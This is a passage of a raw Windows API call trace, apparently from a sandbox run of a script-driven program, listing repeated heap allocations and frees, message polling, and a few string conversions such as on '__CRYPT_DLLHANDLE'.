hHeap=0x970000) returned 1 [0266.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0266.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0266.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0266.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0266.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0266.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0266.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0266.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.013] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0266.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55058 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0266.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0266.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0266.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0266.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f38 [0266.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55008, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f98 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.017] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0266.017] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0266.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.019] 